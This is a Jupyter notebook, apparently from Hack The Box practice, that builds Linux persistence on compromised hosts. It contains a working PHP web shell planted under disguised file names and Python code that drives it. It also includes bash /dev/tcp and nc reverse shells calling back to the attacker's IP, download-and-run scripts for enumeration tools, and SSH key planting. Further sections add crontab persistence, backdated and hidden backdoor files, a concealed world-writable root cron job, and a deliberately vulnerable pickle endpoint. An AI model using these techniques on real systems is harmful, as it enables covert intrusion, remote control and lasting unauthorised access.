# Linux Add Persistance
This notebook is built to add persistance to a linux host

## Global Settings

In [1]:
import requests
import base64

vpnIP="10.10.14.3"
hostIP=vpnIP

destIP="10.10.10.133"
destDNS="onetwoseven.htb"
#http://10.10.10.121/support/uploads/tickets/84fc5b411e00050391e689e16e2924e8.php

destName="OneTwoSeven"

currentDir = "/home/kali/hackthebox"
outputDir = currentDir + "/output/" + destName

<a id="index"></a>
## Index

[PHP Persistance (Local Apache Server)](#php)

[Add crontab to execute a script as root](#crontab)

<a id="phplocal"></a>

## PHP Persistance (Local Apache Server)

[Return to Index](#index)

### PHP execution with a POST variable


### Rebuild the s.txt file for usage below

In [ ]:
# Built for Webserver on Kali
webServerLocation = "/var/www/html/htb/"
fileName = "s.txt"    # If this changes you need to change it below
fileLocation = webServerLocation + fileName
f = open(fileLocation, 'w')
# Command to build from php file
# cat s.txt | sed 's/^/f.write\(@/' | sed 's/$/\\n@)/' | sed "s/@/'/g"
f.write('<?php\n')
f.write('if(isset($_POST["xyz"])){\n')
f.write('        echo "<pre>";\n')
f.write('        $cmd = $_POST["xyz"];\n')
f.write('        system($cmd);\n')
f.write('        echo "</pre>";\n')
f.write('        die;\n')
f.write('}\n')
f.write('?>\n')
f.close()
print("Completed created a new " + fileName)

### Command to Execute for Saving the above PHP

In [4]:
downloadLocation = "http://" + hostIP + "/htb/s.txt"

remoteParentDir = "/var/www/html/edusmart/"
remoteLocation = [remoteParentDir + "sync.php"]
remoteLocation += [remoteParentDir + ".permissions.php"]
remoteLocation += [remoteParentDir + "backup-config.inc.php"]
for l in remoteLocation:
    wgetCommand = "wget " + downloadLocation + " -O " + l
    print(wgetCommand)
    print("\n")

wget http://10.10.14.4/htb/s.txt -O /var/www/html/edusmart/sync.php


wget http://10.10.14.4/htb/s.txt -O /var/www/html/edusmart/.permissions.php


wget http://10.10.14.4/htb/s.txt -O /var/www/html/edusmart/backup-config.inc.php




### Interact with PHP Backdoor
Set to use the above .permissions.php file that is created after initial creation

In [7]:
remoteIP = destIP
remoteIP = "10.10.14.3:60080"
remoteDNS = "registry.htb"

remoteurl = "http://" + remoteIP + "/addons/"
#http://10.10.10.121/support/uploads/tickets/84fc5b411e00050391e689e16e2924e8.php
journal = outputDir + "/phpJournal.txt"

# Change as necessary
remoteBackdoor = "s.php"
remoteLocation = remoteurl + remoteBackdoor
print(remoteLocation)

#commandList = ["ls"]
#commandList += ["uname -a"]
#commandList = ["cat /home/maria/user.txt"]
#commandList = ['uname -a', 'ps -aef --forest', 'netstat -anop', 'cat /etc/crontab', 'ls -lhaR /var/www/html', 'ls -lhaR /home']
#commandList = ['cat /var/www/html/support/uploads/tickets/nc.sh']
#commandList += ['ls -lha /var/www/html/support/uploads/tickets/']
#commandList = ['crontab -l']
#commandList = ['whoami']
#commandList += ['cat /home/help/user.txt']
#commandList = ['mkdir /home/help/.ssh']
#commandList = ['chmod 700 /home/help/.ssh']
#commandList += ['echo c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCZ1FEbjJVcUNwV1ZuSGVzUUk4WFVwZ29BRTJQVTVMVjFFbjFtWkR4ZFJQMVFQcTRHMGxLait3NFJsRFZmZ1gvQ2tEbm4yaDY2V2kwR0RkaWkvK3FmVjU1Z2hjQUhNZ3JSQkRJSU1zMTR5ZVlMUjZSWHJwb0xaT0d5RnBUbnhHT3BtRFJRb2NPTEF3WllOZmxHa1Y5Ti9EWE1maERFTzMzNjlHdEF1UW8zSi9QM0dxRVJoeWtHMHV6OU91elFUY0FsR2wwa2V3RFJlZHJyMnJtdzB6RW9CT3pyYVFYYy92VnZuL0lTL2ZTM2RKZFpkZk9pM2FCemN1NFh2NkM2ZzNjVVdNZEgrVFpwS3RvVGp4dnUrTW1VRDltS0tmOTFUNlR3V1ZNdXJKNmozZ2NNWGR3emlLVVFnZWpOU0lZZGxrc0FKbldKaWtKditjVytnZjBmZWNTV0FzOUNMdUlzZnJlNUpLa0huV0tNU2pGTDRTSUNsVDI2M1A5ckRnQ1hwUXQ3dzQvR3U5ZlVVbG1YYWFQbGxSVExUdEM5WVBMbkd3cjkzdjZHd0pVY0RhYmZyek13TG5VcDRIb0liZVNZcWJHcTc5R2ZRVHNDVGhIaGNYRXhLVnZuN1IxaUdqWlJJbm95bWZOLzBhQWtPSGtWelE5c1crZDNTUHFJRDhvUzJlYVYyL2s9IGthbGlAa2FsaQo= | base64 -d > /home/help/.ssh/authorized_keys']
#commandList += ['chmod 400 /home/help/.ssh/authorized_keys']
#commandList += ['ls -lha /home/help/.ssh']
#commandList = ['bash -c /var/www/html/support/uploads/tickets/nc.sh']
#commandList = ['/var/www/html/support/uploads/tickets/nc.bin 10.10.14.4 8093']
commandList = ["bash -c \"/bin/bash -i >& /dev/tcp/10.10.14.3/8095 0>&1\""]

# The journal is overwritten every time this is executed
f = open(journal, 'w')
for c in commandList:
    postObj = {'xyz': c}
    results = requests.post(remoteLocation, data = postObj)
    #print(results.text)
    f.write("\n\n# Command: " + c)
    f.write("\n####################\n")
    f.write(results.text + "\n")
    f.write("-------------------\n")
f.close()
!cat $journal
print("Completed the command(s) issued!")

http://10.10.14.3:60080/addons/s.php


# Command: bash -c "/bin/bash -i >& /dev/tcp/10.10.14.3/8095 0>&1"
####################
<pre></pre>
-------------------
Completed the command(s) issued!


### Interact with PHP Backdoor for Linpeas Execution

References: https://gtfobins.github.io/

In [4]:
# Local Webserver hosting the file linpeas.txt
#hostIP = "192.168.113.165"
downloadLocation = "http://" + hostIP + "/htb/linpeas.txt"
outputLocation = outputDir + "/linpeasOutput.txt"

# Remote
# Set the backdoors name the execution on the remote server
# .permissions.php is a modified simple-backdoor.php with a POST Request
remoteIP = destIP
remoteurl = "http://" + remoteIP + "/uploads/"

# Change as necessary
backdoor = ".permissions.php"
location = remoteurl + backdoor

# Remote Save Location and Filename for Linpeas
remotePath = "/var/www/html/uploads/"
linpeasLocation = "lp.sh"
linpeasFile = remotePath + linpeasLocation
# Sames the output of linpeas to the below file
linpeasLocationTXT = "lp.sh.swp"
linpeasOutput = remotePath + linpeasLocationTXT

# Script added to the downloader script
commandList = ["#!/bin/bash"]
commandList += ["wget " + downloadLocation + " -O " + linpeasFile]
commandList += ["chmod 700 " + linpeasFile]
commandList += [linpeasFile + " > " + linpeasOutput]

# Create the initial downloader file with the above commandList
downloaderScript = ""
for c in commandList:
    downloaderScript += c + "\n"
#print(downloaderScript)

# Convert the file to base64
b64 = base64.b64encode(downloaderScript.encode('ascii'))
b64String = (b64.decode("utf-8"))

# Remote
# Create into a command that will save the file and execute
#remotePath = "/var/www/html/uploads/"
remoteFile = remotePath + "backup.sh"
c = 'echo "' + b64String + '" | base64 -d > ' + remoteFile + '; chmod 700 ' + remoteFile + '; ' + remoteFile
#print(c)

#for c in commandList:
postObj = {'xyz': c}
results = requests.post(location, data = postObj)
print("Command Executed: " + c)
print("\n")
print(results.text)
print("-------------------\n")
print("\nCompleted the command(s) issued!")

# Copy the file back
downloadResults = remoteurl + linpeasLocationTXT
!wget $downloadResults -O $outputLocation
# View the file and parse out bad chars...
!cat $outputLocation

Command Executed: echo "IyEvYmluL2Jhc2gKd2dldCBodHRwOi8vMTAuMTAuMTQuMi9odGIvbGlucGVhcy50eHQgLU8gL3Zhci93d3cvaHRtbC91cGxvYWRzL2xwLnNoCmNobW9kIDcwMCAvdmFyL3d3dy9odG1sL3VwbG9hZHMvbHAuc2gKL3Zhci93d3cvaHRtbC91cGxvYWRzL2xwLnNoID4gL3Zhci93d3cvaHRtbC91cGxvYWRzL2xwLnNoLnN3cAo=" | base64 -d > /var/www/html/uploads/backup.sh; chmod 700 /var/www/html/uploads/backup.sh; /var/www/html/uploads/backup.sh


<html>
<head><title>504 Gateway Time-out</title></head>
<body bgcolor="white">
<center><h1>504 Gateway Time-out</h1></center>
<hr><center>nginx/1.10.0 (Ubuntu)</center>
</body>
</html>

-------------------


Completed the command(s) issued!
--2021-01-04 23:52:58--  http://10.10.10.24/uploads/lp.sh.swp
Connecting to 10.10.10.24:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 60390 (59K) [application/octet-stream]
Saving to: ‘/home/kali/hackthebox/output/haircut/linpeasOutput.txt’

/home/kali/hacktheb 100%[===================>]  58.97K   330KB/s    in 0.2s    

2021-01-04 23:52

#### Wait for the execution of linpeas to finish!

### Interact with PHP Backdoor for LinEnum Execution

In [5]:
# Local Webserver hosting the file linpeas.txt
#hostIP = "192.168.113.165"
downloadLocation = "http://" + hostIP + "/htb/LinEnum.txt"
outputLocation = outputDir + "/linenumOutput.txt"

# Remote
# Set the backdoors name the execution on the remote server
# .permissions.php is a modified simple-backdoor.php with a POST Request
remoteIP = destIP
remoteurl = "http://" + remoteIP + "/uploads/"

# Change as necessary
backdoor = ".permissions.php"
location = remoteurl + backdoor

# Remote Save Location and Filename for Linpeas
remotePath = "/var/www/html/uploads/"
linenumLocation = "le.sh"
linenumFile = remotePath + linenumLocation
# Sames the output of linpeas to the below file
linenumLocationTXT = "le.sh.swp"
linenumOutput = remotePath + linenumLocationTXT

# Script added to the downloader script
commandList = ["#!/bin/bash"]
commandList += ["wget " + downloadLocation + " -O " + linenumFile]
commandList += ["chmod 700 " + linenumFile]
commandList += [linenumFile + " > " + linenumOutput]

# Create the initial downloader file with the above commandList
downloaderScript = ""
for c in commandList:
    downloaderScript += c + "\n"
#print(downloaderScript)

# Convert the file to base64
b64 = base64.b64encode(downloaderScript.encode('ascii'))
b64String = (b64.decode("utf-8"))

# Remote
# Create into a command that will save the file and execute
#remotePath = "/var/www/html/uploads/"
remoteFile = remotePath + "backupEnum.sh"
c = 'echo "' + b64String + '" | base64 -d > ' + remoteFile + '; chmod 700 ' + remoteFile + '; ' + remoteFile
#print(c)

#for c in commandList:
postObj = {'xyz': c}
results = requests.post(location, data = postObj)
print("Command Executed: " + c)
print("\n")
print(results.text)
print("-------------------\n")
print("\nCompleted the command(s) issued!")

# Copy the file back
downloadResults = remoteurl + linenumLocationTXT
!wget $downloadResults -O $outputLocation
# View the file and parse out bad chars...
!cat $outputLocation

Command Executed: echo "IyEvYmluL2Jhc2gKd2dldCBodHRwOi8vMTAuMTAuMTQuMi9odGIvTGluRW51bS50eHQgLU8gL3Zhci93d3cvaHRtbC91cGxvYWRzL2xlLnNoCmNobW9kIDcwMCAvdmFyL3d3dy9odG1sL3VwbG9hZHMvbGUuc2gKL3Zhci93d3cvaHRtbC91cGxvYWRzL2xlLnNoID4gL3Zhci93d3cvaHRtbC91cGxvYWRzL2xlLnNoLnN3cAo=" | base64 -d > /var/www/html/uploads/backupEnum.sh; chmod 700 /var/www/html/uploads/backupEnum.sh; /var/www/html/uploads/backupEnum.sh


<pre></pre>
-------------------


Completed the command(s) issued!
--2021-01-05 00:22:23--  http://10.10.10.24/uploads/le.sh.swp
Connecting to 10.10.10.24:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 75637 (74K) [application/octet-stream]
Saving to: ‘/home/kali/hackthebox/output/haircut/linenumOutput.txt’

/home/kali/hacktheb 100%[===================>]  73.86K   424KB/s    in 0.2s    

2021-01-05 00:22:24 (424 KB/s) - ‘/home/kali/hackthebox/output/haircut/linenumOutput.txt’ saved [75637/75637]


#########################################################
# Local 

#### Wait for the LinEnum Execution to Complete

### Interact with PHP Backdoor for nc Reverse Shell

In [5]:
# Local Webserver hosting the file 
#hostIP = destIP
# Listen locally on the below port for the reverse shell
hostPort = "8095"
downloadLocation = "http://" + hostIP + "/htb/nc"

# Set the backdoors name the execution on the remote server
# .permissions.php is a modified simple-backdoor.php with a POST Request
remoteIP = "127.0.0.1:60080"
remoteDNS = "onetwoseven.htb"
#http://10.10.10.121/support/uploads/tickets/84fc5b411e00050391e689e16e2924e8.php
remoteurl = "http://" + remoteIP + "/addons/"
# Change as necessary
backdoor = "s.php"
location = remoteurl + backdoor


# Remote Save Location and Filename for nc
ncDir = "/var/www/html/css/"
ncLocation = "nc.bin"
ncFile = ncDir + ncLocation
cronFile = ncDir + "mycron"
backdoor1 = ncDir + backdoor
backdoor2 = ncDir + ".cache.php"

# Script added to the downloader script
"""
commandList = ["#!/bin/bash"]
commandList += ["wget " + downloadLocation + " -O " + ncFile]
commandList += ["sleep 5"]
commandList += ["chmod 700 " + ncFile]
commandList += [ncFile + " " + hostIP + " " + hostPort + " -e /bin/bash &"]
# Add a crontab entry for the user running the web server
# Persistance in crontab
commandList += ["crontab -l > " + cronFile]
commandList += ["echo \"5 * * * * " + ncFile + " " + hostIP + " " + hostPort + " -e /bin/bash &\" >> " + cronFile]
commandList += ["crontab " + cronFile]
commandList += ["rm -f " + cronFile]
# Persistance #2
commandList += ["cp -f " + backdoor1 + " " + backdoor2]
commandList += ["touch -d 190406 " + backdoor2]
commandList += ["chmod 400 " + backdoor2]
"""
commandList = ["bash -c \"/bin/bash -i >& /dev/tcp/10.10.14.3/8095 0>&1\""]
# Create the initial downloader file with the above commandList
downloaderScript = ""
for command in commandList:
    downloaderScript += command + "\n"
#print(downloaderScript)

# Convert the file to base64
b64 = base64.b64encode(downloaderScript.encode('ascii'))
b64String = (b64.decode("utf-8"))

# Create into a command that will save the file and execute
#remotePath = "/var/www/html/htb/"
remoteFile = ncDir + "nc.sh"
c = 'echo "' + b64String + '" | base64 -d > ' + remoteFile + '; chmod 700 ' + remoteFile + '; ' + remoteFile
print(c)

#for c in commandList:
postObj = {'xyz': c}
results = requests.post(location, data = postObj)
print("Command Executed: " + c)
print("\n")
print(results.text)
print("-------------------\n")
print("\nCompleted the command(s) issued!")

ConnectionError: HTTPConnectionPool(host='10.10.110.104', port=80): Max retries exceeded with url: /edusmart/.permissions.php (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7f2cccf72e80>: Failed to establish a new connection: [Errno 110] Connection timed out'))

In [8]:
# Upgrade a nc reverse shell to a python spawned shell
pshell = "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'"
print(pshell)

python3 -c 'import pty; pty.spawn("/bin/bash")'


<a id="crontab"></a>

## Add Crontab to Execute a Script as root

[Return to Index](#index)

<b>Summary:</b>
This creates a python script in /opt that can be modified by all users.  The python script if called cleantemp executes from /etc/crontab every 5 minutes.  This would allow a reverse shell or other commands to be executed.  To kindof hide it from initial view of an editor in /etc/crontab add a lot of newlines in the front.  If you store files in /tmp this is not a good solution.

<b>Execution:</b>
You must have a privileged account to execute this

<b>Setup:</b>
````
touch /opt/cleantemp.py
echo -e "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n*/5 * * * * python /opt/cleantemp.py" >> /etc/crontab

# Contents of cleanuptemp.py
#!/usr/bin/env python
import os
# Clean up temp files on a regular basis
# Change to the below commands that you would like executed
os.system('rm -r /tmp/*')" 

echo "IyEvdXNyL2Jpbi9lbnYgcHl0aG9uCmltcG9ydCBvcwojIENsZWFuIHVwIHRlbXAgZmlsZXMgb24gYSByZWd1bGFyIGJhc2lzCm9zLnN5c3RlbSgncm0gLXIgL3RtcC8qJykK" | base64 -d > /opt/cleantemp.py

chmod 777 cleantemp.py
````

In [ ]:
# Vulnerable pickle app with python3
# https://davidhamann.de/2020/04/05/exploiting-python-pickle/
#!/usr/bin/env python3

import pickle
import base64
from flask import Flask, request, render_template, url_for

app = Flask(__name__)


@app.route("/submit", methods=["POST"])
def submit():
    data = base64.urlsafe_b64decode(request.form['data'])
    deserialized = pickle.loads(data)
    return 'done'

@app.route("/", methods=["GET"])
def index():
    return render_template('index.html')

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=8080, debug=False)